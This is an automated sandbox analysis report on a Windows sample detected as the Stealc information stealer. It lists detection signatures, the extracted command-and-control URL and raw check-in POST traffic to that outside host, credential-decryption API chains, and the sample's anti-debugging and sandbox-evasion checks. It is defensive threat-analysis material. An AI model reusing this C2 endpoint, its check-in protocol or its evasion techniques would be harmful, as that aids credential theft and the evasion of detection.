Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543217
MD5:d42e9bebeb9d3f72398f5a5211b649e1
SHA1:677dc85715152bdc047d55a0a7843ea53690274c
SHA256:70d701780ae74623c6f20f75516cecba15aff040750f911bc73b311a5482b622
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3356 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D42E9BEBEB9D3F72398F5A5211B649E1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2051322816.0000000004F40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3356JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3356JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.9e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-27T13:04:03.454796+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.9e0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_009EC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_009E9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_009E7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_009E9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_009F8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_009EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_009EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_009EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EF68A FindFirstFileA,0_2_009EF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009F3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009E16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_009EBE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 45 42 37 32 31 36 43 31 41 32 34 34 37 37 37 31 30 37 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 2d 2d 0d 0a Data Ascii: ------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="hwid"6A5EB7216C1A2447771074------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="build"puma------JKECGHCFIJDAAKFHJJDH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_009E4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 45 42 37 32 31 36 43 31 41 32 34 34 37 37 37 31 30 37 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 48 43 46 49 4a 44 41 41 4b 46 48 4a 4a 44 48 2d 2d 0d 0a Data Ascii: ------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="hwid"6A5EB7216C1A2447771074------JKECGHCFIJDAAKFHJJDHContent-Disposition: form-data; name="build"puma------JKECGHCFIJDAAKFHJJDH--
                Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/3C;
                Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpJ

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D20_2_00DBA0D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBB0930_2_00CBB093
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBF1EB0_2_00DBF1EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB39910_2_00DB3991
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCC94A0_2_00CCC94A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E179720_2_00E17972
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB89040_2_00DB8904
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB01040_2_00DB0104
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DACA210_2_00DACA21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5F2190_2_00E5F219
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB1BD40_2_00DB1BD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7C3FA0_2_00D7C3FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D35B660_2_00D35B66
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBBB650_2_00DBBB65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB6DD40_2_00DB6DD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2BDD60_2_00E2BDD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAE5A30_2_00DAE5A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA26D90_2_00CA26D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E956FC0_2_00E956FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D886F40_2_00D886F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBD63B0_2_00DBD63B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D927D80_2_00D927D8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009E45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: viycrjrr ZLIB complexity 0.994612532747006
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_009F8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_009F3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\HBN1DL2F.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1866752 > 1048576
                Source: file.exeStatic PE information: Raw size of viycrjrr is bigger than: 0x100000 < 0x1a1800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.9e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;viycrjrr:EW;xfsmgicr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;viycrjrr:EW;xfsmgicr:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009F9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cae21 should be: 0x1cf434
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: viycrjrr
                Source: file.exeStatic PE information: section name: xfsmgicr
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA30ED push 74C997D3h; mov dword ptr [esp], ebx0_2_00EA3E99
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 1295D803h; mov dword ptr [esp], esp0_2_00DBA0E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], edi0_2_00DBA134
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ebp; mov dword ptr [esp], 6477CCFFh0_2_00DBA16D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push edi; mov dword ptr [esp], ebx0_2_00DBA178
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 08219782h; mov dword ptr [esp], edx0_2_00DBA1B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 2F63DA4Ah; mov dword ptr [esp], edi0_2_00DBA1DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 5A2E2576h; mov dword ptr [esp], eax0_2_00DBA21B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], eax0_2_00DBA227
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], eax0_2_00DBA236
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ebp; mov dword ptr [esp], esi0_2_00DBA2E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push edi; mov dword ptr [esp], 7AF56F19h0_2_00DBA344
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], 7B7FA62Ch0_2_00DBA362
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push edx; mov dword ptr [esp], eax0_2_00DBA3A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 6C936F36h; mov dword ptr [esp], edx0_2_00DBA3E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 2CFA03BBh; mov dword ptr [esp], ebx0_2_00DBA3ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], 74F8AE41h0_2_00DBA3F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 30122E1Ch; mov dword ptr [esp], ebp0_2_00DBA43D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 5601B85Bh; mov dword ptr [esp], edx0_2_00DBA4E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], ecx0_2_00DBA5DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 177435ACh; mov dword ptr [esp], ebx0_2_00DBA634
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push esi; mov dword ptr [esp], 4A8DD2FEh0_2_00DBA655
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], ebx0_2_00DBA665
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 66547C81h; mov dword ptr [esp], ecx0_2_00DBA713
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push eax; mov dword ptr [esp], 769DC6E3h0_2_00DBA7C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], 7FF70B32h0_2_00DBA7EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 54DDB361h; mov dword ptr [esp], edx0_2_00DBA804
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], 771B1670h0_2_00DBA82C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push ebp; mov dword ptr [esp], 5CBD4B43h0_2_00DBA83E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push 63F74AAAh; mov dword ptr [esp], ecx0_2_00DBA87C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA0D2 push eax; mov dword ptr [esp], 7DF7A362h0_2_00DBA8EA
                Source: file.exeStatic PE information: section name: viycrjrr entropy: 7.953397310962952

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009F9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13670
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4239E second address: C423A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4C87 second address: DC4C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8133 second address: DB8137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8137 second address: DB8152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F66B1272F5Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8152 second address: DB8157 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8157 second address: DB8162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3C77 second address: DC3C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC3C81 second address: DC3C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4387 second address: DC4396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
